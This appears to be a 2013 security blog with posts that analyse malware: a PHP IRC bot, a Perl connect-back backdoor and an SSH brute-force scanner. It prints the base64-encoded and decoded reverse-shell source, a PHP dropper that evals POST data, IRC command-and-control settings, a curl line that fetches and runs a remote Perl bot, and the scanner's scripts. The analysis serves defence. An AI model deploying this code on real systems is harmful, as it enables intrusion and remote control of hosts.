Irregular Expressions


April 28, 2013  2:59 AM

PHP Bot Decoding – Part 1

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

The good news is we can handle these samples very easily. The first base64 looks like it will take a bit of work but the second one we can decode right now.

I just happen to have a perl script I wrote to do just the thing.


#!/usr/bin/perl
use Compress::Zlib;

use MIME::Base64;

$new = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";

$test = MIME::Base64::decode $new;
print "$test";

It’s not complex but it does the work well and you can use > to redirect to a file if the base64 turns out to be a binary. In this case we don’t need to worry, it’s another perl script.


#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] \n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "" x 4;
exit(0);
}

I wanted to look up what that pack command was doing so I put it in to Google. It brings up a lot a hits with samples from perl courses showing how to make a client server application. I won’t be following this anymore, if you are wondering pack is used in perl to, well pack data.

I am going to need a couple days to check the rest of this out. Stay tuned.

April 28, 2013  2:43 AM

Looking For Samples?

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Practice is always good.  There is a few sites a look at when I am looking for things to analyze, one that always seems to have something for me to look at is clean-mx.de. I just pulled what looks like a PHP bot off of one of the database entries. I post a snippet below.


^JaVa Coder^ shell v2.0 ^Ojo Dumeh^

body {
color: white; background-color: black;
font-size: 12px;
font-family: Helvetica,Arial,Sans-Serif;
}

<?
$dir = @getcwd();
echo "JaVa Coder 
";
$OS = @PHP_OS;
echo "OSTYPE :$OS 
";
echo "uname -a; $uname 
";
$free = disk_free_space($dir);
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {

One thing I look for in these bots is URL’s / IP’s and Base64 encoded stuff. We have both in this sample, two Base64;


<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlNzZhfnIjIGBhPywlNjklMkMjJTVGYCUzQmk9PyIlMzclMzYjJTJFfDEkJTM2JTMzfCUyRT8iOyQlNjF+JTNEJTVCIiUzNzglMkUxJTM1NyMlMkV+JTMxPyUzNCUzMiUyRT81OCMiJCUyQyU2OSQlMkIlMjI/JTMxfDQlMzF8LiUzM2A1IixpK34iMSQlMzk/MS4xMyElMzIiJTVEQDslNUZ8PTElM0IkJTY5JCU2NiQlMjgjZCU2RmAlNjMjdX5tfGUhJTZFJTc0LiFjb3xvYGtpPyU2NS5tYSU3NEBjJTY4YChALyMlNUMlNjIlNjghZyMlNjZgJTc0fCUzRDEvKSUzRH49IyU2RXUjbCU2Q2ApQGZvcn4oYCU2OSQlM0QlMzAlM0IlNjlAJTNDMyUzQiU2OSUyQiMlMkIjKSQlNjQjbyU2MyN1fm1+JTY1YCU2RSU3NC5+JTc3ciNpPyU3NCU2NXwlMjgiQCUzQ35zY3xyP2klNzAjJTc0QCUzRXwlNjkjZn4lMjh+XyMlMjlkJCU2RiElNjN8JTc1YG1lfiU2RXQkJTJFJTc3JTcyJTY5JTc0QCU2NSUyOEAlNUMiQCUzQyMlNzMlNjMlNzIlNjlwJTc0fiBAaWQ/JTNEJTVGJTIyJTJCQGklMkIjIl9gIHMhcmMjPX4vQC9gIn4rPyU2MX5baT8lNUQlMkIiJTJGY34lNzAvJTNFJTNDQCU1QyMlNUNAJTJGJTczJCU2Mz9yJTY5ISU3MGAlNzQhJTNFfCU1QyUyMiMpIyUzQyU1QyUyRiU3MyFjP3IlNjkjcGB0JTNFfiUyMkAlMjkjOycpLnJlcGxhY2UoL2B8XCF8I3xcfHxcJHxcP3xAfH4vZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i

And


$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";

We have what looks to be the IRC C&C.

class pBot
{
var $config = array("server"=>"106.187.97.158",
"port"=>"7000",
"pass"=>"toni",
"prefix"=>"Ddoser",
"maxrand"=>"4",
"chan"=>"#FBI",
"chan2"=>"#CIA",
"key"=>"toni",
"modes"=>"+ps",
"password"=>"toni",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost scanner.crew)

We also have a URL to check out.


<?
$url="http://ircq.wap.sh/";
exec('cd /tmp;curl -O '.$url.'mild2.txt;perl mild2.txt;rm -rf mild2.txt*;');

And it looks like we got another bot to look at in mild2.txt.


#!/usr/bin/perl
#
# What is New in V2.3 ? :
#
# + Improved Scanner
# + Improved Configuration
# + Nmap PortScan
# + LogCleaner
# + Mailer
#
#You can use the following commands :
#!bot @portscan
#!bot @nmap
#!bot @back
#!bot @udpflood
#!bot @tcpflood
#!bot @httpflood
#!bot @linuxhelp
#!bot @hajar
#!bot @system
#!bot @milw0rm
#!bot @logcleaner
#!bot @sendmail
#!bot @join
#!bot @part
#!bot @help
#!bot cd tmp for example
#!bot !eval

It also uses the same IRC server.


$servidor='106.187.97.158' unless $servidor;
my $porta='7000';


April 28, 2013  2:12 AM

SSH Brute Force Scanner – Tools Used

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

I mentioned a few tools as I was looking at the unixcod scanner, but I thought it would be nice to place them all in one post.

IDA Pro Free;

One thing I did not mention about this, is that it is cross platform.   Yes you can run it on Linux and OSX.  Well at least the full version.  The only thing to watch out for is that when you start working on a file it will start in graph view.  You can change it easy but right clicking on it and selecting text.  Graph view is handy but I prefer to spend most of my time in text view.

 

REMnux;

There is no point re-inventing the wheel.  All of the tools I usually need when preforming analysis are included with REMnux.  Most of the time I use it to emulate and capture network traffic samples could be making.   Using the utilities farpd (fake arp), and fakedns you can have REMnux redirect any traffic being made to itself.  It also comes with an IRC server and a pre-made fake web server that uses nc (netcat).   Strings which I mentioned more then once is also on here, it should be included in most distro’s and if it is not you should be able to install it.  I would just recommend doing all of your sample work away from production machines.  It just takes one slip up and you could be in trouble.   With REMnux you can have it running as a VM and just revert the state.

 


April 28, 2013  1:55 AM

SSH Brute Force Scanner – Part 6

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Well after working with the scanner for a couple hours I cannot seem to entice any other behavior out of it other then collecting a list of IP’s and associated logins.  Also after more static analysis of it I cannot see anything that says it will do more then that.

I did do some looking around on the Internet to see what else comes up with ‘unixcod’, there was lots of talk but I found a couple links that are worth sharing.

First check out this thread about a hacked web server.  Does that not look familiar?


unix]# ls -al
total 4352
drwxr-xr-x 2 apache apache 360 Jun 3 23:47 .
drwxrwxrwt 3 root root 60 Jun 3 00:24 ..
-rwxr-xr-x 1 apache apache 0 May 19 06:02 124.164.find.22
-rwxr-xr-x 1 apache apache 0 Mar 24 22:28 129.135.find.22
-rwxr-xr-x 1 apache apache 0 Mar 24 22:25 129.find.22
-rwxr-xr-x 1 apache apache 0 May 25 13:54 21.168.find.22
-rwxr-xr-x 1 apache apache 12687 May 25 06:16 60.191.find.22
-rw-r--r-- 1 apache apache 0 Jun 3 23:45 83.182.find.22
-rwxr-xr-x 1 apache apache 4631 Apr 21 17:50 84.2.find.22
-rwxr-xr-x 1 apache apache 0 May 25 06:17 89.38.find.22
-rwxr-xr-x 1 apache apache 2362 May 19 15:28 91.204.find.22
-rwxr-xr-x 1 apache apache 216 May 18 2005 auto
-rwxr-xr-x 1 apache apache 4374933 May 15 19:41 data.conf
-rwxr-xr-x 1 apache apache 15729 Oct 14 2005 find
-rw-r--r-- 1 apache apache 5262 Jun 3 23:45 log
-rwxr-xr-x 1 apache apache 751 May 25 06:33 unix
-rw-r--r-- 1 apache apache 0 Jun 3 23:04 vuln.txt
-rwxr-xr-x 1 apache apache 671 May 25 13:56 x

The only addition file is ‘x’ which seems to be a copy of ‘unix’ in this case.

The other link is a pastbin dump.  It is a long one.  Someone has uploaded a chat log of IRC sessions.  What appears to be going on is a group is working on locating servers with root and what they mention as just smtp.  They are using the compromised servers for spam of financial users.  It sure seems like they are phising, but nothing that says it 100%.  Also I am unsure of what the smtp is, but I think they are looking for mail servers that they can use for mass mailings.  They are also using unixcod for collecting of these accounts, there is more then a few dumps of logins posted in that pastbin.


April 27, 2013  12:04 AM

SSH Brute Force Scanner – Part 5

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

I have been doing some basic things with ‘atack’, one of the first things I do with samples is run ‘strings’ against it. I find this a great way to try and see what the binary is going to do before you start running it in your test environment. I have a few suspicions about it, one of them is I think it may have the ability to do file system operations like copy.

Another excellent tool you can use is IDA Pro Free. If you like IDA Pro Free the good news is you can but the retail version. The only feature that I think is work mentioning in the non-free version is it has the ability to transform your dump in to sudo-code. But other then that the free version will more then suffice for what we are doing.

The first place I go once I have a sample opened is the names window.
names

The good news is,  my initial feeling that ‘atack’ had the ability to copy files seems to be correct.

sftp_name

sftp

Now we can check our stings again and see if we what we have mentioned that looks like a file path. There is a few that I think are worth following.


strings atack | egrep "/\S+\/" | less
%s/.ssh/identity
%s/.ssh/id_dsa
%s/.ssh/id_rsa
%s/.ssh/identity.pub
%s/.ssh/id_dsa.pub
%s/.ssh/id_rsa.pub
/etc/resolv.conf
/etc/host.conf
/etc/nsswitch.conf
/etc/localtime
/usr/share/zoneinfo
/etc/mtab
/etc/fstab


April 26, 2013  1:40 AM

SSH Brute Force Scanner – Part 4

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

I have made some progress with ‘atack’ just attacking my local analysis machine. I still have lots of work to do but I have figured out some more of what it is up to.

Currently I still do not know the purpose of adding the digits when executing, but I am sure I will figure that out once I start static analysis of the file. Changing the number does not seem to do much, but it could be due to my limited environment and data files that I have created for it.

On my analysis machine I have created two users, and in the data file I am using the interface IP address and the local loopback address as a second system entry.


/unixcod$ cat data.conf
test test
test1 test

/unixcod$ cat ip.conf
127.0.0.1
IPAddress

The test user does not have a home directory created, and test1 does. While examining the strings of ‘atack’ there was mention of home directories but I have not been able to see any difference between the two when I am testing.

If the attempts are successful ‘atack’ respond on the console.

UnixCoD own ->test:test:IPAddress

It will also create a file in the working directory called vuln.txt with a similar list of usernames and addresses.


cat vuln.txt
test:test:IPAddress

Currently it does not attempt to do anything with the compromised accounts, but these are also empty. I am wondering if it will go for any keys sitting in .ssh if they were to exist.


April 24, 2013  9:47 PM

SSH Brute Force Scanner – Part 3

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Next it seems like they started counting all of the lines in the ‘ip.conf’ that contained periods ‘.’ and then stored them in ‘$oopsnr2′, but then they do not call it again.


oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"

They even make a reference to it in the comments. “Only $ oopsnr2 servers. There is a beginning for. all”.

Now ‘atack’ is launched.

./atack 100
rm -rf $1.find.22 ip.conf

I am not entirly sure of what the significance of ’100′ is after the command it will take some further analysis of ‘atack’ to figure that part out.

But since we have the file in my sand box, I can at least poke at it. It also looks like we are going to have to recreate the ‘ip.conf’ file if we are going to get this to work. I created one with just 127.0.0.1, then we can watch the logs on the local system and see what happens.

Launching ‘./atack 100′ will just return the following;


[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]

Then it continues to operate in the background trying to login.

pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=localhost user=root
Failed password for root from 127.0.0.1 port 42106 ssh2

There is lots going on inside of ‘atack’ part 4 will be dealing with it.


April 24, 2013  9:13 PM

SSH Brute Force Scanner – Part 2

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

The ‘data.conf’ file is a list of usernames and passwords to attempt. It contains 24,024 combinations.


root root
admin admin
test test
guest guest
webmaster webmaster

The included file ‘find’ appears to be a network scanner of some sort. I might come back to this but it is not really what I am looking for.

‘test.txt’ seems to be the output from running ‘auto’, but it looks like it was missing some flags. It is a 2.0M file with nothing but the following in it.

./assh 192.168.1.0 ; ./assh 192.168.1.0 ; ./assh 192.168.1.0 ;

‘unix’ appears to be what ties this all together now that we kinda know what each part is about.


#!/bin/bash
if [ $# != 1 ]; then
echo "[+] Folosim : $0 [b class]"
exit;
fi

echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+] SSH Brute force scanner : user & password [+]"
echo "[+] Undernet Channel : #UnixCoD [+]"
echo "[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]"
./find $1 22

sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"

Since they were not nice enough to put English comments in, we have to use Google translate to tell what it says. But I think we can figure it out from here.

The ‘if’ statement at the start is looking to make sure an option was provided on the command line.

if [ $# != 1 ]; then

I am pretty sure it is looking for a network range, the next command is executing ‘find’ and providing it with what was given on the command line ‘$1′ and a port. It’s port 22, no surprise here if they are looking for ssh servers.

./find $1 22

Next it creates a file called ‘ip.conf’ that contains a unique list of all of the hosts that ‘find’ located.

cat $1.find.22 |sort |uniq > ip.conf

Part 3


April 24, 2013  8:54 PM

SSH Brute Force Scanner – Part 1

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

I was looking around and found an article about an SSH Brute Force Scanner someone had gotten a hold of but they could not get it working.

You can read it here.

When you unpack the tarball this is what you are going to get.


/unixcod# ls
atack auto data.conf find ip.conf test.txt unix

Looking quickly at the files ‘atack’ appears to be what is doing all of the work here. The others are either data files or wrappers to execute ‘atack’.

The file ‘auto’ is just a loop to try a range address against ‘./assh’, which is not included with this bundle. It could be that it is simply a renamed version of ‘atack’, but they don’t use the same options.


#!/bin/sh
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
echo -n "./assh $brange.$crange ; " >> $file
let crange=crange+1
done

When auto is ran, it will ask for a range, what it is looking for is something like 192.168.0 but not the last octet. You can see that is taken care of by the variable ‘$crange’ in the while loop. Every loop through will increase ‘$crange’ until 255. This is simple script and not really useful if you want to scan more then a class A network.

Part 2


April 24, 2013  8:13 PM

New VirusTotal Functionality

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Virus total now allows you to send pcap ( Packet captures ) files directly to them.

Here is one of the examples of what you can send that they provided.

VirusTotal is an excellent tool, and this provides a handy place to send your traffic that you have captured from your network or sandbox for quick analysis.

Just a quick word of caution on sending samples and now pcap files to sites like virus total. While it is handy to have the searchable analysis, remember that anyone can search those results. If you happen to be part of a targeted attack you could be tipping your hand to the attacker. They can be searching sites like this for IP’s and hashes involved in their attack. Once the attacker knows that they have been discovered they could do anything including damaging systems in an effort to cover up.


Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: